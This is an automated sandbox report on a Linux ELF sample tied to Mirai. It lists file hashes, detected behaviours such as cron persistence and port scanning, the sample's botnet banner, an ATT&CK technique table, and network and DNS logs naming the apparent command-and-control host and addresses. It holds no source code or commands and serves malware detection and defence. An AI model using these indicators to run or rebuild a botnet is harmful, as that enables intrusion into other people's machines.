Edit tour
Linux
Analysis Report
nshkarm.elf
Overview
General Information
Sample name: | nshkarm.elf |
Analysis ID: | 1576787 |
MD5: | 0ca916db64f11f41d5398a921b17f03d |
SHA1: | cc58d153c591a329a0312f6d0b4490df874ca51e |
SHA256: | aef5642907d2349271ba29b866800d26beb5eb8831bcc217529e6585b242bc89 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1576787 |
Start date and time: | 2024-12-17 15:17:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 39s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | nshkarm.elf |
Detection: | MAL |
Classification: | mal60.troj.linELF@0/1@12/0 |
- VT rate limit hit for: nshkarm.elf
Command: | /tmp/nshkarm.elf |
PID: | 6246 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | you are now apart of hail cock botnet |
Standard Error: | no crontab for root |
- system is lnxubuntu20
- dash New Fork (PID: 6221, Parent: 4332)
- dash New Fork (PID: 6222, Parent: 4332)
- nshkarm.elf New Fork (PID: 6248, Parent: 6246)
- sh New Fork (PID: 6251, Parent: 6248)
- nshkarm.elf New Fork (PID: 6253, Parent: 6246)
- nshkarm.elf New Fork (PID: 6296, Parent: 6253)
- nshkarm.elf New Fork (PID: 6254, Parent: 6246)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: |
Networking |
---|
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Stderr: no crontab for root: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 File Deletion | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
21% | ReversingLabs | Linux.Backdoor.Mirai |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kingstonwikkerink.dyn | 80.78.26.121 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
80.78.26.121 | kingstonwikkerink.dyn | Cyprus | 37560 | CYBERDYNELR | false | |
212.64.215.71 | unknown | Turkey | 15395 | RACKSPACE-LONGB | true | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.189.91.43 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
91.189.91.42 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
RACKSPACE-LONGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Moobot, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse |
| ||
CYBERDYNELR | Get hash | malicious | Quasar | Browse |
| |
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Bazar Loader | Browse |
| ||
Get hash | malicious | Bazar Loader, BruteRatel | Browse |
| ||
Get hash | malicious | Bazar Loader, BruteRatel | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
INIT7CH | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
|
⊘No context
⊘No context
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 306 |
Entropy (8bit): | 5.157134578854361 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLvpUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8WeHLUHYC+GABjnOGAFkz |
MD5: | 542B8F21550244BB1D2E2FEAAF4C724B |
SHA1: | CBB7E4471B27D2CB992E478F1B554C4E08B4B197 |
SHA-256: | 200CFCA9F347C0FC53FBC84F14F740C2DCF98F49026C8339BBD359FEA62FECB7 |
SHA-512: | 0649A492D6E8622054E019156C31C12DA65C460BF7ED9076E91584A9FD9F6009778410AFCC96BA9D570DD4814A1E5D3D5AB7423F1BA8AB6FC639AA8233190741 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.120978968859602 |
TrID: |
|
File name: | nshkarm.elf |
File size: | 76'232 bytes |
MD5: | 0ca916db64f11f41d5398a921b17f03d |
SHA1: | cc58d153c591a329a0312f6d0b4490df874ca51e |
SHA256: | aef5642907d2349271ba29b866800d26beb5eb8831bcc217529e6585b242bc89 |
SHA512: | 7ea4a9f195680ee596a3674d8c6cab5baaa57b0c85972cd07cb08835421880c27320f64d9977eb9ca8c721de34c90bb39d756c9c6f43c248edda351dfaf26407 |
SSDEEP: | 768:UwxxdU9ZaN3A0Lljcjclxz7zHHcf6Eg/1WW2CQuoNDdSf4p5NdjMlNofRHeR++Ev:LxxcEJb74fEA0f4HolCRLZlyQIsgvj |
TLSH: | 88732981BD815A13C6D112BBFB2E418D772713A8D2EE7203DE25AF21778792B0E77641 |
File Content Preview: | .ELF...a..........(.........4...8(......4. ...(.....................`$..`$..............d$..d$..d$.......T..........Q.td..................................-...L."...xB..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 75832 |
Section Header Size: | 40 |
Number of Section Headers: | 10 |
Header String Table Index: | 9 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x8094 | 0x94 | 0x18 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80b0 | 0xb0 | 0x10a18 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x18ac8 | 0x10ac8 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x18adc | 0x10adc | 0x1984 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x22464 | 0x12464 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x2246c | 0x1246c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x22478 | 0x12478 | 0x380 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x227f8 | 0x127f8 | 0x50fc | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.shstrtab | STRTAB | 0x0 | 0x127f8 | 0x3e | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x8000 | 0x8000 | 0x12460 | 0x12460 | 6.1512 | 0x5 | R E | 0x8000 | .init .text .fini .rodata | |
LOAD | 0x12464 | 0x22464 | 0x22464 | 0x394 | 0x5490 | 2.8684 | 0x6 | RW | 0x8000 | .ctors .dtors .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 17, 2024 15:17:56.134092093 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 17, 2024 15:17:57.965347052 CET | 55686 | 13079 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:17:58.085562944 CET | 13079 | 55686 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:17:58.085664034 CET | 55686 | 13079 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:17:58.085928917 CET | 55686 | 13079 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:17:58.206590891 CET | 13079 | 55686 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:17:58.206710100 CET | 55686 | 13079 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:17:58.326404095 CET | 13079 | 55686 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:17:59.560482979 CET | 13079 | 55686 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:17:59.560750008 CET | 55686 | 13079 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:17:59.560918093 CET | 55686 | 13079 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:18:01.509500980 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 17, 2024 15:18:02.277299881 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 17, 2024 15:18:04.828728914 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:04.948472023 CET | 1443 | 34836 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:04.948628902 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:04.948692083 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:05.068530083 CET | 1443 | 34836 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:05.068764925 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:05.188649893 CET | 1443 | 34836 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:14.957513094 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:15.077346087 CET | 1443 | 34836 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:15.254098892 CET | 1443 | 34836 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:15.254240990 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:15.254306078 CET | 34836 | 1443 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:16.355268955 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 17, 2024 15:18:25.554858923 CET | 35868 | 9641 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:25.674645901 CET | 9641 | 35868 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:25.674751043 CET | 35868 | 9641 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:25.674947023 CET | 35868 | 9641 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:25.794485092 CET | 9641 | 35868 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:25.794864893 CET | 35868 | 9641 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:25.914522886 CET | 9641 | 35868 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:28.641629934 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 17, 2024 15:18:29.963634014 CET | 9641 | 35868 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:29.964016914 CET | 35868 | 9641 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:29.964016914 CET | 35868 | 9641 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:32.736934900 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 17, 2024 15:18:50.220511913 CET | 52052 | 6052 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:50.340203047 CET | 6052 | 52052 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:50.340451002 CET | 52052 | 6052 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:50.340517998 CET | 52052 | 6052 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:50.460208893 CET | 6052 | 52052 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:50.460355997 CET | 52052 | 6052 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:18:50.580010891 CET | 6052 | 52052 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:18:57.309533119 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 17, 2024 15:19:00.646754980 CET | 6052 | 52052 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:19:00.646958113 CET | 52052 | 6052 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:19:00.646994114 CET | 52052 | 6052 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:19:10.963161945 CET | 51780 | 7237 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:11.083008051 CET | 7237 | 51780 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:11.083235025 CET | 51780 | 7237 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:11.083235025 CET | 51780 | 7237 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:11.202831030 CET | 7237 | 51780 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:11.203069925 CET | 51780 | 7237 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:11.322649002 CET | 7237 | 51780 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:12.555401087 CET | 7237 | 51780 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:12.556108952 CET | 51780 | 7237 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:12.556108952 CET | 51780 | 7237 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:17.800957918 CET | 59334 | 17375 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:17.921132088 CET | 17375 | 59334 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:17.921292067 CET | 59334 | 17375 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:17.921494007 CET | 59334 | 17375 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:18.041034937 CET | 17375 | 59334 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:18.041264057 CET | 59334 | 17375 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:18.161494017 CET | 17375 | 59334 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:19.397440910 CET | 17375 | 59334 | 212.64.215.71 | 192.168.2.23 |
Dec 17, 2024 15:19:19.397739887 CET | 59334 | 17375 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:19.397778988 CET | 59334 | 17375 | 192.168.2.23 | 212.64.215.71 |
Dec 17, 2024 15:19:24.665359974 CET | 49438 | 9535 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:19:24.784869909 CET | 9535 | 49438 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:19:24.784997940 CET | 49438 | 9535 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:19:24.785069942 CET | 49438 | 9535 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:19:24.904967070 CET | 9535 | 49438 | 80.78.26.121 | 192.168.2.23 |
Dec 17, 2024 15:19:24.905050039 CET | 49438 | 9535 | 192.168.2.23 | 80.78.26.121 |
Dec 17, 2024 15:19:25.024735928 CET | 9535 | 49438 | 80.78.26.121 | 192.168.2.23 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 17, 2024 15:17:57.697324038 CET | 54212 | 53 | 192.168.2.23 | 185.181.61.24 |
Dec 17, 2024 15:17:57.892610073 CET | 47227 | 53 | 192.168.2.23 | 185.181.61.24 |
Dec 17, 2024 15:17:57.959239006 CET | 53 | 54212 | 185.181.61.24 | 192.168.2.23 |
Dec 17, 2024 15:17:58.147958040 CET | 53 | 47227 | 185.181.61.24 | 192.168.2.23 |
Dec 17, 2024 15:17:58.150461912 CET | 43129 | 53 | 192.168.2.23 | 202.61.197.122 |
Dec 17, 2024 15:17:58.395908117 CET | 53 | 43129 | 202.61.197.122 | 192.168.2.23 |
Dec 17, 2024 15:17:58.397948027 CET | 59584 | 53 | 192.168.2.23 | 185.181.61.24 |
Dec 17, 2024 15:17:58.657967091 CET | 53 | 59584 | 185.181.61.24 | 192.168.2.23 |
Dec 17, 2024 15:17:58.661374092 CET | 50315 | 53 | 192.168.2.23 | 5.161.109.23 |
Dec 17, 2024 15:18:04.563355923 CET | 59961 | 53 | 192.168.2.23 | 65.21.1.106 |
Dec 17, 2024 15:18:04.827590942 CET | 53 | 59961 | 65.21.1.106 | 192.168.2.23 |
Dec 17, 2024 15:18:06.671763897 CET | 60717 | 53 | 192.168.2.23 | 152.53.15.127 |
Dec 17, 2024 15:18:06.913773060 CET | 53 | 60717 | 152.53.15.127 | 192.168.2.23 |
Dec 17, 2024 15:18:20.257036924 CET | 55563 | 53 | 192.168.2.23 | 5.161.109.23 |
Dec 17, 2024 15:18:25.263470888 CET | 51781 | 53 | 192.168.2.23 | 202.61.197.122 |
Dec 17, 2024 15:18:25.553378105 CET | 53 | 51781 | 202.61.197.122 | 192.168.2.23 |
Dec 17, 2024 15:18:34.965770006 CET | 39709 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 17, 2024 15:18:39.969077110 CET | 43307 | 53 | 192.168.2.23 | 137.220.52.23 |
Dec 17, 2024 15:18:44.974376917 CET | 60089 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 17, 2024 15:18:49.981177092 CET | 42972 | 53 | 192.168.2.23 | 217.160.70.42 |
Dec 17, 2024 15:18:50.218965054 CET | 53 | 42972 | 217.160.70.42 | 192.168.2.23 |
Dec 17, 2024 15:19:05.648499012 CET | 48766 | 53 | 192.168.2.23 | 5.161.109.23 |
Dec 17, 2024 15:19:10.652637959 CET | 54509 | 53 | 192.168.2.23 | 168.235.111.72 |
Dec 17, 2024 15:19:10.962188959 CET | 53 | 54509 | 168.235.111.72 | 192.168.2.23 |
Dec 17, 2024 15:19:17.558130026 CET | 43948 | 53 | 192.168.2.23 | 202.61.197.122 |
Dec 17, 2024 15:19:17.799712896 CET | 53 | 43948 | 202.61.197.122 | 192.168.2.23 |
Dec 17, 2024 15:19:24.399821043 CET | 45018 | 53 | 192.168.2.23 | 65.21.1.106 |
Dec 17, 2024 15:19:24.664244890 CET | 53 | 45018 | 65.21.1.106 | 192.168.2.23 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 17, 2024 15:17:57.697324038 CET | 192.168.2.23 | 185.181.61.24 | 0xbfba | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:04.563355923 CET | 192.168.2.23 | 65.21.1.106 | 0x9cad | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:20.257036924 CET | 192.168.2.23 | 5.161.109.23 | 0xc33d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:25.263470888 CET | 192.168.2.23 | 202.61.197.122 | 0xef5d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:34.965770006 CET | 192.168.2.23 | 178.254.22.166 | 0x2d1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:39.969077110 CET | 192.168.2.23 | 137.220.52.23 | 0x792f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:44.974376917 CET | 192.168.2.23 | 51.158.108.203 | 0x8326 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:49.981177092 CET | 192.168.2.23 | 217.160.70.42 | 0x6853 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:19:05.648499012 CET | 192.168.2.23 | 5.161.109.23 | 0x60c8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:19:10.652637959 CET | 192.168.2.23 | 168.235.111.72 | 0x690b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:19:17.558130026 CET | 192.168.2.23 | 202.61.197.122 | 0xc4a8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:19:24.399821043 CET | 192.168.2.23 | 65.21.1.106 | 0x37ea | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 17, 2024 15:17:57.959239006 CET | 185.181.61.24 | 192.168.2.23 | 0xbfba | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:17:57.959239006 CET | 185.181.61.24 | 192.168.2.23 | 0xbfba | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:17:58.147958040 CET | 185.181.61.24 | 192.168.2.23 | 0xbfba | Format error (1) | none | none | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:17:58.395908117 CET | 202.61.197.122 | 192.168.2.23 | 0xb5dc | Format error (1) | none | none | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:17:58.657967091 CET | 185.181.61.24 | 192.168.2.23 | 0xebeb | Format error (1) | none | none | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 15:18:04.827590942 CET | 65.21.1.106 | 192.168.2.23 | 0x9cad | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:18:04.827590942 CET | 65.21.1.106 | 192.168.2.23 | 0x9cad | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:18:25.553378105 CET | 202.61.197.122 | 192.168.2.23 | 0xef5d | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:18:25.553378105 CET | 202.61.197.122 | 192.168.2.23 | 0xef5d | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:18:50.218965054 CET | 217.160.70.42 | 192.168.2.23 | 0x6853 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
